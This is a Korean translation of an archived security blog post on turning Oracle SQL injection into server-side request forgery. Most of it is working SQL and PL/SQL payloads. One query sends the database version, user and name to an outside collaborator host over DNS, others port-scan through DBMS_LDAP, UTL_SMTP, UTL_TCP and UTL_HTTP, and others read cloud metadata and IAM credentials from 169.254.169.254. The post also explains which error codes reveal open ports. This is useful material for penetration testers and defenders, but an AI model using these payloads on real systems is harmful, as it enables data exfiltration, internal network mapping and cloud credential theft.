https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/의 삭제된 게시물을 웨이백 머신의 사본으로 제공합니다.

SSRF

Oracle을 사용하여 Out of Band HTTP 및 DNS 요청을 수행하는 방법은 SQL 데이터 유출의 수단으로 잘 문서화되어 있습니다. 이러한 기술/함수를 항상 수정하여 다른 SSRF/XSPA를 수행할 수 있습니다.

Oracle을 설치하는 것은 정말 고통스러울 수 있습니다. 특히 명령어를 시도해보기 위해 빠른 인스턴스를 설정하려는 경우에는 더욱 그렇습니다. Appsecco의 친구이자 동료인 Abhisek Datta가 https://github.com/MaksymBilenko/docker-oracle-12c를 소개해줬습니다. 이를 통해 t2.large AWS Ubuntu 머신과 Docker에 인스턴스를 설정할 수 있었습니다.

이 블로그 포스트의 과정 동안 Oracle을 네이티브 설치로 모방하고 전체 네트워크 액세스 권한을 갖도록 --network="host" 플래그를 사용하여 도커 명령을 실행했습니다.

docker run -d --network="host" quay.io/maksymbilenko/oracle-12c

URL 또는 호스트 이름/포트 번호 지정을 지원하는 Oracle 패키지

호스트와 포트 지정을 지원하는 패키지와 함수를 찾기 위해 Oracle Database Online Documentation에서 Google 검색을 실행했습니다. 특히,

site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"

다음은 검색 결과입니다 (모두가 아웃바운드 네트워크를 수행하는 데 사용될 수는 없습니다)

• DBMS_NETWORK_ACL_ADMIN

• UTL_SMTP

• DBMS_XDB

• DBMS_SCHEDULER

• DBMS_XDB_CONFIG

• DBMS_AQ

• UTL_MAIL

• DBMS_AQELM

• DBMS_NETWORK_ACL_UTILITY

• DBMS_MGD_ID_UTL

• UTL_TCP

• DBMS_MGWADM

• DBMS_STREAMS_ADM

• UTL_HTTP

이러한 원시적인 검색은 당연히 DBMS_LDAP와 같은 패키지를 건너뛰며 (호스트 이름과 포트 번호를 전달하는 것을 허용함) 문서 페이지는 단순히 다른 위치로 안내합니다. 따라서, 놓친 아웃바운드 요청을 수행하기 위해 남은 Oracle 패키지가 있을 수 있습니다.

어쨌든, 우리가 발견하고 위에 나열한 몇 가지 패키지를 살펴보겠습니다.

DBMS_LDAP.INIT

DBMS_LDAP 패키지는 LDAP 서버에서 데이터에 액세스할 수 있도록 합니다. init() 함수는 LDAP 서버와의 세션을 초기화하고 호스트 이름과 포트 번호를 인수로 사용합니다.

이 함수는 이전에 DNS를 통해 데이터 유출을 보여주기 위해 문서화되었습니다. 아래와 같이

SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;

그러나 함수가 호스트 이름과 포트 번호를 인수로 받기 때문에 이를 이용하여 포트 스캐너처럼 작동시킬 수도 있습니다.

다음은 몇 가지 예시입니다.

SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;

ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.는 세션 값이 포트가 열려있음을 가리키는 동안 포트가 닫혀있음을 나타냅니다.

UTL_SMTP

UTL_SMTP 패키지는 SMTP를 통해 이메일을 보내기 위해 설계되었습니다. Oracle 문서 사이트에서 제공하는 예제는 이 패키지를 사용하여 이메일을 보내는 방법을 보여줍니다. 그러나 우리에게 흥미로운 것은 호스트와 포트를 지정할 수 있는 능력입니다.

아래에는 UTL_SMTP.OPEN_CONNECTION 함수를 사용한 간단한 예제가 나와 있습니다. 타임아웃은 2초로 설정되어 있습니다.

DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
END;

DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
END;

ORA-29276: 전송 시간 초과는 포트가 열려 있지만 SMTP 연결이 수립되지 않았음을 나타내며, ORA-29278: SMTP 일시적 오류: 421 서비스를 사용할 수 없음은 포트가 닫혀 있음을 나타냅니다.

UTL_TCP

UTL_TCP 패키지와 해당 프로시저 및 함수는 TCP/IP 기반 서비스와의 통신를 가능하게 합니다. 특정 서비스를 위해 프로그래밍된 경우, 이 패키지는 네트워크로의 진입로가 될 수도 있으며 TCP/IP 연결의 모든 측면을 제어할 수 있기 때문에 완전한 서버 측 요청을 수행할 수도 있습니다.

Oracle 문서 사이트의 예제에서는 이 패키지를 사용하여 웹 페이지를 가져오기 위해 원시 TCP 연결을 생성하는 방법을 보여줍니다(https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190). 우리는 이를 간단히 하여 메타데이터 인스턴스나 임의의 TCP/IP 서비스에 요청을 보낼 수 있습니다.

set serveroutput on size 30000;
SET SERVEROUTPUT ON
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
/

DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;

흥미롭게도, 원시 TCP 요청을 만들 수 있는 능력 때문에 이 패키지는 모든 클라우드 제공업체의 인스턴스 메타데이터 서비스를 쿼리하는 데에도 사용될 수 있습니다. 메소드 유형과 추가 헤더는 모두 TCP 요청 내에서 전달될 수 있기 때문입니다.

UTL_HTTP 및 웹 요청

아마도 가장 일반적이고 널리 문서화된 기술은 모든 Out of Band Oracle SQL Injection 튜토리얼에서 UTL_HTTP 패키지입니다. 이 패키지는 문서에서 다음과 같이 정의됩니다 - UTL_HTTP 패키지는 SQL 및 PL/SQL에서 하이퍼텍스트 전송 프로토콜(HTTP) 호출을 수행합니다. 이를 사용하여 HTTP를 통해 인터넷 상의 데이터에 액세스할 수 있습니다.

select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;

다음과 같은 쿼리를 사용하여 일부 기본적인 포트 스캐닝도 수행할 수 있습니다.

select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;

ORA-12541: TNS:no listener 또는 TNS:operation timed out은 TCP 포트가 닫혀있음을 나타내는 신호입니다. 반면 ORA-29263: HTTP protocol error 또는 데이터는 포트가 열려있음을 나타냅니다.

과거에 다양한 성공률로 사용한 다른 패키지는 HTTPURITYPE 오라클 추상 타입의 GETCLOB() 메서드입니다. 이 메서드는 URL과 상호작용하고 HTTP 프로토콜을 지원하는 기능을 제공합니다. GETCLOB() 메서드는 URL에서 GET 응답을 CLOB 데이터 유형으로 가져오는 데 사용됩니다. [select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;